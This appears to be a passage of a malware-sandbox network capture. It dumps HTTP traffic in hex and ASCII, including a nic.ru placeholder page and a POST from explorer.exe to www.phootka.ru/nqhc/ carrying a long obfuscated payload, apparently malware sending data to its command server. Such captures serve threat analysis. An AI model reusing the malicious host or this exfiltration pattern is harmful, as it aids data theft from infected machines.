                                                                                                                                                                          Dec 5, 2022 15:17:40.790781021 CET11960INData Raw: 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e
                                                                                                                                                                          Data Ascii: output.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++];
                                                                                                                                                                          Dec 5, 2022 15:17:40.790858984 CET11961INData Raw: 74 61 20 2f 20 64 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: ta / damp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floo
                                                                                                                                                                          Dec 5, 2022 15:17:40.790930033 CET11963INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("puny
                                                                                                                                                                          Dec 5, 2022 15:17:40.790987968 CET11964INData Raw: 30 2c 20 6c 65 6e 20 3d 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: 0, len = output.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.enco
                                                                                                                                                                          Dec 5, 2022 15:17:40.791043043 CET11965INData Raw: 30 3b 20 6a 20 3c 20 69 6e 70 75 74 5f 6c 65 6e 67 74 68 3b 20 2b 2b 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a
                                                                                                                                                                          Data Ascii: 0; j < input_length; ++j) { ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow
                                                                                                                                                                          Dec 5, 2022 15:17:40.791138887 CET11967INData Raw: 6f 41 53 43 49 49 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 20 64 6f 6d 61 69 6e 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: oASCII = function ( domain ) { var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za
                                                                                                                                                                          Dec 5, 2022 15:17:40.791203022 CET11968INData Raw: 65 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: een; } .logo { padding: 30px 40px; } .content { display: flex; justify-content: space-between; margin: 0 82px; } .left { display: fl
                                                                                                                                                                          Dec 5, 2022 15:17:40.791290045 CET11969INData Raw: 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                                                                          Data Ascii: : 15px; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0 100 42" fill="none" xmlns="http://www.w3.org/2
                                                                                                                                                                          Dec 5, 2022 15:17:40.791357040 CET11971INData Raw: 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 33 2e 31 35 30 39 20 31 34 2e 31 37 38 38 43 35 33 2e
                                                                                                                                                                          Data Ascii: 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556 12.7287 52.7556 12.47C52.455 12.211 52.0227
                                                                                                                                                                          Dec 5, 2022 15:17:40.836297035 CET11972INData Raw: 36 34 30 35 20 31 30 2e 30 34 39 34 43 36 35 2e 39 36 37 38 20 31 30 2e 30 34 39 34 20 36 35 2e 33 35 32 31 20 31 30 2e 31 37 35 37 20 36 34 2e 37 39 32 20 31 30 2e 34 32 35 37 43 36 34 2e 32 33 31 37 20 31 30 2e 36 37 37 39 20 36 33 2e 36 31 33
                                                                                                                                                                          Data Ascii: 6405 10.0494C65.9678 10.0494 65.3521 10.1757 64.792 10.4257C64.2317 10.6779 63.6136 11.0274 62.9346 11.475L63.2065 10.3343L58.7385 10.3351L58.2337 12.5144H59.3852L57.5098 20.6619H60.8287L62.5044 13.3418C62.9323 13.1149 63.3172 12.9453 63.6601


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          49192.168.11.2049891195.24.68.2380C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:42.806799889 CET12005OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.phootka.ru
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.phootka.ru
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.phootka.ru/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 71 7a 73 4a 57 71 35 6b 67 56 6c 4e 75 55 39 7a 55 71 57 72 34 4d 51 66 33 33 46 69 79 35 32 59 5a 69 79 4f 42 75 70 61 78 67 75 67 68 56 4a 36 6e 5a 64 4e 62 37 76 47 7a 48 67 62 55 64 56 6b 78 55 4d 58 38 46 77 49 73 6a 79 54 6b 45 72 53 6f 72 71 37 34 38 79 39 37 62 64 38 35 6c 6e 64 49 5a 28 79 4f 75 53 54 37 76 7a 38 53 31 51 53 55 30 7a 63 54 5f 74 30 41 6e 42 74 69 6c 62 39 6e 53 62 38 39 57 76 78 34 30 55 36 4f 5a 50 35 4d 52 78 73 4f 4e 63 30 49 72 31 69 44 59 37 68 6b 6b 50 70 56 55 76 79 41 36 54 73 6e 6a 6d 72 4d 6b 44 4e 78 54 56 71 62 67 43 37 54 75 44 61 66 71 48 7a 78 31 73 53 41 72 51 56 43 73 53 36 36 67 53 4a 6d 62 76 63 62 34 32 51 38 35 53 69 44 77 4a 79 5a 30 69 53 79 75 6a 32 65 46 78 4d 56 41 50 5a 7a 49 44 6d 43 5a 45 4b 45 63 6b 4f 76 32 49 68 57 33 79 31 53 6d 45 77 54 30 72 4a 44 7a 37 7a 68 65 50 50 68 68 4d 49 30 48 4a 79 67 49 55 70 62 67 4c 58 6a 58 4b 33 42 45 6b 61 43 75 61 58 79 53 39 53 6c 58 45 50 28 4a 41 6a 43 5a 48 6b 34 48 73 32 66 42 7e 66 54 7a 78 59 7a 70 58 32 43 45 63 46 59 6d 35 47 71 6e 41 70 33 58 65 69 45 56 71 36 72 5f 4a 52 59 53 56 62 43 64 4a 71 77 76 59 55 39 70 5a 63 4f 62 57 55 43 33 51 6b 33 4d 6b 56 62 76 35 73 47 65 78 4a 42 38 52 61 56 76 79 50 46 5f 57 51 28 39 6f 77 49 35 4f 6e 6d 79 67 50 63 37 54 6c 44 45 79 4d 41 51 62 4d 46 61 75 76 74 6e 56 67 52 78 38 56 4a 64 6e 50 6d 55 38 6f 75 33 4e 51 69 67 37 6f 53 58 73 5f 69 77 39 68 6a 69 32 52 4d 79 6f 44 73 77 31 6c 7a 46 73 62 43 30 49 45 43 59 72 66 48 69 59 67 31 35 49 64 42 46 42 64 45 46 78 72 66 4e 50 35 65 71 7e 66 4c 61 43 6b 43 65 69 48 68 6d 37 44 38 6f 4d 73 49 34 4a 6a 7a 6a 42 71 67 5f 53 72 6e 48 7a 4a 52 6b 6f 63 5a 58 4b 4f 47 4c 73 73 30 51 44 4c 67 44 30 34 6b 65 6c 4d 7e 4c 6e 72 68 57 71 44 39 31 43 67 70 45 75 4e 65 70 78 76 56 71 59 46 62 44 32 59 43 6c 4a 4b 5a 68 71 56 66 46 39 51 46 45 53 39 46 4d 58 42 55 64 42 5a 6f 6a 47 4a 34 47 79 6e 54 5a 31 33 69 37 76 6d 59 6f 69 65 6b 4b 53 53 58 4d 41 52 37 32 39 2d 68 73 71 57 58 64 38 48 41 6b 33 77 57 5f 68 33 4a 4f 6e 70 47 5a 33 52 45 72 47 4c 57 55 72 64 74 5f 49 34 41 52 51 34 54 46 54 57 4f 31 32 34 33 4b 35 52 71 74 71 76 33 5f 46 78 71 56 59 46 33 39 64 6c 64 69 6a 65 54 70 39 79 66 37 4e 34 48 65 41 64 52 71 64 35 37 69 31 71 65 53 31 6f 33 37 4f 30 4d 58 58 77 62 58 56 5a 74 50 77 47 73 68 48 6f 66 6a 61 68 6e 79 59 4b 55 74 73 4f 6e 64 59 53 64 6e 43 70 64 72 57 66 4b 4d 70 34 6d 62 76 2d 61 4b 28 31 63 6f 46 39 59 7a 61 33 4e 46 4e 5a 72 69 44 38 6f 73 61 31 31 4e 33 30 6d 30 56 56 32 41 58 6e 4d 30 6e 32 79 72 4f 34 49 37 61 76 35 34 57 6f 56 5f 46 54 74 33 4f 35 6f 7a 44 7a 70 4b 66 35 59 6d 46 75 77 55 69 70 7e 6c 74 51 7e 2d 35 68 33 43 75 73 4b 6c 31 79 78 37 5a 77 31 31 4b 58 6e 4f 78 4d 30 77 49 59 76 53 54 62 39 45 54 76 47 72 52 6e 52 4e 61 76 46 31 68 71 35 4e 4f 78 78 49 37 62 74 4a 66 54 41 6a 6c 73 54 61 76 4d 79 72 35 41 43 33 71 68 55 51 75 4d 38 6e 74 34 61 6e 62 62 54 4a 7e 73 33 78 35 4d 61 66 62 7a 31 4f 72 55 64 4d 7e 53 38 57 62 52 54 48 59 46 4b 64 7e 69 6e 7a 66 5a 6b 37 4f 44 64 48 66 7a 39 32 69 45 39 61 73 4d 4a 51 79 44 44 57 68 4c 4e 75 42 33 79 6b 55 53 7e 66 79 4c 48 4a 5a 7a 55 61 31 43 45 36 32 79 4a 42 6f 54 64 7a 51 46 35 48 73 48 54 35 61 6c 4d 51 38 6b 41 62 47 78 44 32 34 56 47 6d 42 4c 4c 7a 78 70 37 71 54 52 42 6f 37 52 73 64 78 37 73 62 55 41 31 30 73 78 31 52 4b 78 53 78 52 6d 65 5a 4c 4a 51 47 66 79 55 56 52 70 38 6e 49 6f 50 35 6c 6b 47 6d 68 4c 56 68 65 48 4d 66 73 5a 50 70 71 76 75 74 52 56 32 4f 39 37 6a 58 4e 72 53 44 28 34 72 47 4c 6b 46 31 62 5a 6b 4e 4f 4e 61 44 69 69 5a 68 72 38 6a 6c 76 62 51 43 37 69 75 69 48 77 54 74 7e 56 52 69 59 55 37 7a 48 6f 63 44 33 2d 56 33 69 32 71 6f 50 46 57 68 54 59 41 6d 7e 72 4b 6e 56 53 45 6e 6a 4d 31 44 70 76 39 6b 57 6b 32 50 50 4c 65 41 67 35 62 4a 51 63 4e 6b 6f 46 48 2d 43 43 44 6b 78 4c 55 75 55 35 41 44 62 6e 37 51 42 4f 57 31 78 6c 34 42 4d 65 54 32 6c 6e 41 41 43 32 6f 4b 51 63 30 39 38 45 44 54 63 39 42 62 4e 4f 6b 41 63 32 48 70 7a 31 53 4a 46 76 71 33 77 5a 61 48 75 52 58 47 72 63 45 6a 74 4c 6a 71 64 58 35
                                                                                                                                                                          Data Ascii: 7nWHV=qzsJWq5kgVlNuU9zUqWr4MQf33Fiy52YZiyOBupaxgughVJ6nZdNb7vGzHgbUdVkxUMX8FwIsjyTkErSorq748y97bd85lndIZ(yOuST7vz8S1QSU0zcT_t0AnBtilb9nSb89Wvx40U6OZP5MRxsONc0Ir1iDY7hkkPpVUvyA6TsnjmrMkDNxTVqbgC7TuDafqHzx1sSArQVCsS66gSJmbvcb42Q85SiDwJyZ0iSyuj2eFxMVAPZzIDmCZEKEckOv2IhW3y1SmEwT0rJDz7zhePPhhMI0HJygIUpbgLXjXK3BEkaCuaXyS9SlXEP(JAjCZHk4Hs2fB~fTzxYzpX2CEcFYm5GqnAp3XeiEVq6r_JRYSVbCdJqwvYU9pZcObWUC3Qk3MkVbv5sGexJB8RaVvyPF_WQ(9owI5OnmygPc7TlDEyMAQbMFauvtnVgRx8VJdnPmU8ou3NQig7oSXs_iw9hji2RMyoDsw1lzFsbC0IECYrfHiYg15IdBFBdEFxrfNP5eq~fLaCkCeiHhm7D8oMsI4JjzjBqg_SrnHzJRkocZXKOGLss0QDLgD04kelM~LnrhWqD91CgpEuNepxvVqYFbD2YClJKZhqVfF9QFES9FMXBUdBZojGJ4GynTZ13i7vmYoiekKSSXMAR729-hsqWXd8HAk3wW_h3JOnpGZ3RErGLWUrdt_I4ARQ4TFTWO1243K5Rqtqv3_FxqVYF39dldijeTp9yf7N4HeAdRqd57i1qeS1o37O0MXXwbXVZtPwGshHofjahnyYKUtsOndYSdnCpdrWfKMp4mbv-aK(1coF9Yza3NFNZriD8osa11N30m0VV2AXnM0n2yrO4I7av54WoV_FTt3O5ozDzpKf5YmFuwUip~ltQ~-5h3CusKl1yx7Zw11KXnOxM0wIYvSTb9ETvGrRnRNavF1hq5NOxxI7btJfTAjlsTavMyr5AC3qhUQuM8nt4anbbTJ~s3x5Mafbz1OrUdM~S8WbRTHYFKd~inzfZk7ODdHfz92iE9asMJQyDDWhLNuB3ykUS~fyLHJZzUa1CE62yJBoTdzQF5HsHT5alMQ8kAbGxD24VGmBLLzxp7qTRBo7Rsdx7sbUA10sx1RKxSxRmeZLJQGfyUVRp8nIoP5lkGmhLVheHMfsZPpqvutRV2O97jXNrSD(4rGLkF1bZkNONaDiiZhr8jlvbQC7iuiHwTt~VRiYU7zHocD3-V3i2qoPFWhTYAm~rKnVSEnjM1Dpv9kWk2PPLeAg5bJQcNkoFH-CCDkxLUuU5ADbn7QBOW1xl4BMeT2lnAAC2oKQc098EDTc9BbNOkAc2Hpz1SJFvq3wZaHuRXGrcEjtLjqdX5A(Dm1RxiWDliVAFs_Mb1AmyNRflgp1T4Pv9bQ8xtyXvWqbOOu5j4V3FEPu61Z6ALC0OkhdgC8Re8CvtZSfI8VQ7Rem3y5aKyG2IYuoMn-L0x9zQlq2BJQAoLlGmfGDtFgZH7o226XqIMzSTQU52M_MBAZ1XDM6JX7ZiZhC3MV2uxFVByoxyd9of6gnG8eEU~jDdvszaCjCZo0VSVwwjdKIO3T(jDcTErcshGNbVjUAmJHMWv6dd4ORhlRuuoN1eLPlc(WGoeeIfxqN9HNFEqOU5oT00e48s01N47WKVg8gjlHIkxEV4Fj1PKoqA2zIAIHDZbE0LTumwcW73ytPn3De-HrJ1JBU3rsygqzlt1n8vcAp3dPAy1TpouAXptWx2Mu2SOhrg~9mwQyG9Ba2EzKWpkBVWiEvGreVG8u7_YV6KBgq3NTf13eikNMVZc7qWDvM-3V091K(CScjlL51AqsxmjTZ2ylX5gW6ERL6dLjJKDPtjgLdHHxw0DJ44k3goeNk8hc~AHRWUXhmpkPY3ooKTVrl6KwUyG9FWiKXAVl5r~ou3lSUiYsmc(LR5GXyQVOJPbXv0NX5AyNWqDjfjsu(h(iuV62oZ4bVUYuBqZlMV~1reg04Q82cvAU~XY6op04IofonFe9jB4VLomxQDkhZhriUoAkt2RfvmThPYCLfh7RpAHxfn06pVHo6bGGtuH7eDCHkQSv13r99BYR7vS0wMjmKx6bsyb2VDYoYDcB0Z8TuzinyJmBzG8W~vZQRk7mTuWsLXSeIoiibnF3lpGuwzt2Qgc1cWs98aLohCjZD0O7fw(ehFlSVG9EKqoKhrEo6wiCA_gF3xlS5lB0rDc5S-ffnb2zGG(6GdcVjRiy8Y44o1FceLz7l5nBkhrBhC(tZyImgi7P(zEAMh6pJgYJ8ufv1kz7wJ(GMtpQuP0nGL9mbAph7ZSHIpCg7aTQ(MeXD61ke5kZRiQ8yeygUfsr0Oeo8rBn5pRN30UX84fJwEi5MpF2sIh70-zt4EKR66YDB7gQl-Rd2ZMeQamY5KEOLcmkpdrjO1eit7N7y2t0Z8o6Zzf_pI9YwIlkGnmDoA6ei88dYDlEQv9sCtrLim1OznZDLaOP5If74FESfSvNqu2gX7OH3G1MMkeNFHQ2pHzPG44eW2GnwfhtUngR9EnJJNtM(QTq80KOg7nxT828ymEo7LGFxDMzitqefDA-ovr-CFu23f1GWzUmJob4pHP2vyYYnz0TDBJY6vbi2SjCMNhj7z3IJsGZBXvOha3geDgSSLVk08QYl2402w9jx5(NbD5Vy08ztVgp~L0ztBZl4MdcOGxsISfbDblpFH9hcA(NOyC65GcYSnCjaaqjP3ubxhUt~FiHxNlB~X4OkcrAR5rFzUMluKm30_fGzgE0x4yi7ldG~v1LZvlwtBKS3acZSMKrora1UGv4FE~RU668sNrNimo53G31sXeUxyd4Y_NYteHuaA0GxXP39mHkOx5x7gpsznfr0LCqHmfmrNKYKM4h9rhK6HN95LR1fp1Dn9IA3Vz76fq0pavPG4sWSYhsrejt3b1OeweaUEKVgeJrK96UoTbF03RIq1wnxJEC3RXfYE3fLr8o4h3dIS0T2QXVwRmnbcYBbfN1qaJxNhz4fPrnsam38OQomI40vteHegLpokx33yllWKLk4QVnnn6tJXbLKMm07JedwVUHVbqzurQ3LVhpL5TgSzKJXU8_xEj523~bqli4denbQZP18hulLqsYzkUF4htLzLp8r-S_yJYmUCRJUf6HAO0lD8st~RIJ8NyE420YMjA4J8~Qry~kDMJJ5qkMgzVsVQqXgxohw0w8puMOWsVqqm6ZxtIsghdCJ93cFNrB0PsiDYuFR2Ohz04_xUpA30McS0zSXZO7mk5oqeU9QzOABQODPILzcRlUrSPlon5kshoSEobb(yU2wUAyswTPrUkFNhf8T-IaLRBiDVP8z2ESivzSQFbgEBPjVe0eiCBsz90bNEYOZIDguFm8LoelYV7MPdy7wP189lmnMESTemIwc0RQ37K91dv9pkeiT9ID0URxEcNPWpfPeu77AeQbJw7zmTakoZ8AgKe3h4HYisTlCYcPOuuzfE2jeJIdTyMAw1g-2m30ysKmhgoa71w4m8wxIe8yLCr7xolBHm6HkudXQ6olPCc9z43h3xfOqf(ieJBO5u~-0Tq9QK3dFt~dy4grV-reYn~oswlrS_6W4EQHQSfKnRbpZuvGnkBL36ahQWTt~QRdCjmikwmLjfvIYG7LDqRRhmyrddmafcaqS6UlrD44rmPYtTrcA-d7KfQ42O0Dplf-VwPRZRGcmGky2wxGtjuHNbP7BU58AfzGB2hYQGtY8127Qh871X63g7fvajFmYf2uC0CvYmyQZ8lgXN3gPDr5Xt0JZRXdR7OBlInnXDFj19lStoWJDNChE9e7yz7uB4MNXCChmUu2ufxt0cB1991b5MPc6s1YiDT-gMT119R2WcIVA_1paWgyIsfQjN1XYLWLxdUD5n3U9FNFA7mZiqADM8zYrl(hIdw3kPze4S01omIxF2FTP5Gqlg4R~N6L~H82WUX3d1c8NL1_5a7gUC5zT7JKMFXz(PpBOC(Di546YPo5cNCzn9SautHmnKO1z6ErauLxmjYSffQnuxc5CwjP1Ky6SzAmayFO81(uU3aXMqNW~xrfHUfyb6169MHQ7vNBhAJatLnA13hAsUHVrX
                                                                                                                                                                          Dec 5, 2022 15:17:42.806889057 CET12011OUTData Raw: 6a 73 57 70 56 61 41 53 76 51 6e 39 70 5f 61 32 57 35 4a 64 72 34 43 43 4f 67 51 74 28 71 65 5a 7a 38 76 58 7e 5a 70 6c 32 6d 78 44 57 34 33 4b 64 31 65 66 32 4b 65 47 55 51 28 78 28 32 72 54 74 50 51 39 6c 2d 53 65 66 33 5a 79 32 53 68 56 54 56
                                                                                                                                                                          Data Ascii: jsWpVaASvQn9p_a2W5Jdr4CCOgQt(qeZz8vX~Zpl2mxDW43Kd1ef2KeGUQ(x(2rTtPQ9l-Sef3Zy2ShVTVIzG0w4ed4mLBoLzyNcusMTfrTOX7ghcUFDOsXD3tvU(LutEmvYHIZhkMckwQ4Ft-U8IZ5ZxBVBfez2ViIwshThGQYQCPT1Ij~V3g9Z5fjktlUCBayuSY2dHrFC0y6AfcgO(L8mQ40Isl0Qo7o78l5DXbzEFyRHqG3
                                                                                                                                                                          Dec 5, 2022 15:17:42.852701902 CET12014OUTData Raw: 6d 79 64 36 5a 39 45 6c 28 62 6f 2d 76 46 4e 4d 6b 44 46 37 78 4e 72 73 4a 32 48 68 4c 5a 79 39 64 71 62 48 64 39 6a 7a 37 50 31 36 78 71 4e 43 48 53 55 5a 67 59 48 56 64 43 6a 50 50 6f 52 79 6d 66 69 71 46 75 62 50 7e 39 38 30 77 78 48 4c 77 2d
                                                                                                                                                                          Data Ascii: myd6Z9El(bo-vFNMkDF7xNrsJ2HhLZy9dqbHd9jz7P16xqNCHSUZgYHVdCjPPoRymfiqFubP~980wxHLw-eAwk~7xnWZaSSnvSWrbCPt(PLBTHXDWmBu~0nwNFvJ2yxUdGx8p13OjCkd0AEdkY5C(AKYDKQ291jvmHabCRbt3Fdlneoq(ylV9e~HTa~c6UrZwR1ZS3GBpS9sv6PG8z6b4yJussYl6KSBJAyIqNSsWDYVcbu7Bpt
                                                                                                                                                                          Dec 5, 2022 15:17:42.852823973 CET12019OUTData Raw: 36 65 32 44 28 48 67 6a 57 41 5a 32 38 77 4c 75 63 6e 61 46 79 6d 67 7a 73 68 64 53 41 6e 28 2d 64 77 41 33 48 34 49 51 67 31 6d 6c 4e 78 4c 4d 38 65 6a 4d 67 47 74 6a 47 5a 28 72 75 74 51 78 47 79 6e 39 7e 71 28 73 54 31 71 4d 78 69 52 6c 79 34
                                                                                                                                                                          Data Ascii: 6e2D(HgjWAZ28wLucnaFymgzshdSAn(-dwA3H4IQg1mlNxLM8ejMgGtjGZ(rutQxGyn9~q(sT1qMxiRly4S9932exRn-osbTXeQQhnxkVGR46M2WfU2TkVPEx_bhJ1UQG9ngE3e1Qjg-AvQ4p-BTXk1JT9(AIIBn75IT3UgptmccWCu7qnt6xspo~Jrql5796ozrNXur4Qz34-4H9ytTIJGWFfFyHxMTS_dlKOaRKTHjcmFiXKj
                                                                                                                                                                          Dec 5, 2022 15:17:42.853034973 CET12020OUTData Raw: 4b 5f 6d 54 64 76 52 44 68 73 39 67 70 45 33 53 75 57 37 59 63 36 58 36 31 65 6a 48 5a 67 38 62 4c 51 7e 47 52 71 37 44 32 66 6c 6b 6b 69 46 34 6c 71 63 41 6e 57 7a 43 37 55 50 6d 4e 78 59 44 42 46 4c 4c 6d 72 39 39 58 6a 30 34 69 7a 4b 70 42 4c
                                                                                                                                                                          Data Ascii: K_mTdvRDhs9gpE3SuW7Yc6X61ejHZg8bLQ~GRq7D2flkkiF4lqcAnWzC7UPmNxYDBFLLmr99Xj04izKpBLsaUvf3eySjA2Q3F8YneeCF5ayb(Eh04KMjmdKdW5lEY4Mpac3HGRAIjMId2GQ3wZO-lDwPbDzDO0KyWXlNKqROPzo_(CD4FNztr4QmCtxTUctAezpLnWfRPbiKsqmBf92ZIbqibd0H32oP3DQIFKJsceuDaAVMxje
                                                                                                                                                                          Dec 5, 2022 15:17:42.853209019 CET12029OUTData Raw: 6d 4e 47 73 58 68 41 41 51 53 68 51 68 76 71 67 4a 58 45 59 6e 31 4e 33 6a 4d 64 5f 4d 4a 63 48 65 75 47 77 42 44 6d 5a 56 33 33 73 4f 4e 54 6b 6c 5f 66 58 6b 51 70 58 5a 67 37 52 52 39 4e 33 42 68 59 62 6e 59 74 59 30 39 68 54 28 47 47 51 42 79
                                                                                                                                                                          Data Ascii: mNGsXhAAQShQhvqgJXEYn1N3jMd_MJcHeuGwBDmZV33sONTkl_fXkQpXZg7RR9N3BhYbnYtY09hT(GGQByBVK7TWFMuPJN54GxY9vvs8oKkWQ6zEYk6NU8Bibd1W2VatWt97Gxd6DN1XfDl19zxh3Uo9J0(aD9Xb(Fdsrrs_Bte07OmNsEasq9EcYvyMnA(AoiSZzHb0W5(9vdP0qQGKk_tEyiFotpnS(GvN1QpNpevsXXUKNF6
                                                                                                                                                                          Dec 5, 2022 15:17:42.853389978 CET12034OUTData Raw: 41 6e 62 62 7a 6b 38 6d 45 57 4e 4a 73 31 51 33 34 49 42 32 71 73 77 79 4e 30 57 4a 42 6a 36 38 42 73 79 64 43 6c 69 58 64 47 30 6e 68 6d 42 57 64 48 30 6a 79 74 7e 56 67 4e 7a 34 69 4c 5a 78 56 6e 6f 71 73 76 51 34 53 56 77 36 73 73 6b 56 44 62
                                                                                                                                                                          Data Ascii: Anbbzk8mEWNJs1Q34IB2qswyN0WJBj68BsydCliXdG0nhmBWdH0jyt~VgNz4iLZxVnoqsvQ4SVw6sskVDb3SyJSIjz8ymZX7NAPDqzrDKEm61jJAJsT-NuiUeLjSm92l1cEgjszZeGd3yYvYYO7SS7YMD5yplhWl(cPKGk4gpVcvY-LyLDu1cG~WW83XyMvG(wnc6PjppGisPNmdYwaAoPkhE7ShOppRCJOdXiQGBa~gBYKyNUp
                                                                                                                                                                          Dec 5, 2022 15:17:42.853543043 CET12036OUTData Raw: 54 79 6b 4f 51 4c 52 50 56 79 33 70 57 6a 35 59 6a 51 74 4f 73 71 30 55 50 35 76 54 53 65 6d 63 4b 59 64 55 4e 38 67 4d 50 72 71 46 72 63 28 61 52 79 55 52 51 2d 61 38 55 4f 65 76 6c 56 6b 41 50 68 42 4f 36 56 61 6e 5a 35 77 47 70 6b 6b 32 34 6d
                                                                                                                                                                          Data Ascii: TykOQLRPVy3pWj5YjQtOsq0UP5vTSemcKYdUN8gMPrqFrc(aRyURQ-a8UOevlVkAPhBO6VanZ5wGpkk24me5Exo0YFlW7zjVC9Trg4z3DVjADbQvvxB6kKqOChBkwiYcWwSo0ko_P2bTT3me1bLEb6Lctr5yaxYgbe8vgD5l8-UyIe~oQlLRdokrz7ehmvPyBKjmY4AFrozU~m6M(XGK1uYPHdck9b~cSvc8VkL6VwoOUq5yefx
                                                                                                                                                                          Dec 5, 2022 15:17:42.853723049 CET12037OUTData Raw: 48 74 46 78 37 38 59 6a 57 54 58 36 7e 4d 6c 46 52 71 6d 53 4e 35 36 73 36 62 66 39 34 51 41 35 54 55 6d 42 70 45 4d 74 4b 5f 6f 36 44 46 30 57 54 4f 75 50 6c 41 53 73 43 6d 32 39 44 62 42 62 41 48 31 66 32 6c 51 39 7e 77 73 55 44 6c 58 75 61 38
                                                                                                                                                                          Data Ascii: HtFx78YjWTX6~MlFRqmSN56s6bf94QA5TUmBpEMtK_o6DF0WTOuPlASsCm29DbBbAH1f2lQ9~wsUDlXua8wruTMx(lul25LImduaXKVJonjAvnLAKvWpFM5nUvJItQzJCnFJMhtg~pxoQk2D9XP5hvasAVeVTHkawF7ur_ZitqBFVlV7Zvp0z8wQfWlFFyxMV1cuGb3N1Q9oWxeIZRhfRftVRb1IQ92A2zDPUvcr16da0UlGJOP
                                                                                                                                                                          Dec 5, 2022 15:17:42.898597002 CET12040OUTData Raw: 6f 33 62 59 28 78 7e 30 37 6d 64 51 53 50 52 65 4e 6b 52 31 67 46 4d 48 67 59 50 2d 4a 55 75 76 56 4d 74 68 42 45 72 71 61 4d 39 4c 55 69 73 5a 65 39 4b 33 76 5f 49 54 4d 77 70 37 52 65 48 37 79 55 7a 54 6b 33 4d 39 4c 31 6f 76 64 49 72 6f 64 43
